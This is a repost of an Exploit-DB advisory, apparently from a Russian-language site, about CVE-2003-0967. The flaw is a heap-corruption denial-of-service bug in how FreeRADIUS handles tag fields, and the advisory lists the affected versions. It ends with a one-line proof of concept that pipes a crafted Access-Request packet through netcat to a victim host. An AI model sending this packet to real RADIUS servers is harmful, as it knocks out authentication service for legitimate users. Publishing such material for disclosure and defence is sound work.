- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23391
- Проверка EDB
-
- Пройдено
- Автор
- EVGENY LEGEROV
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2003-0967
- Дата публикации
- 2003-11-20
Код:
source: https://www.securityfocus.com/bid/9079/info
FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>- Источник
- www.exploit-db.com
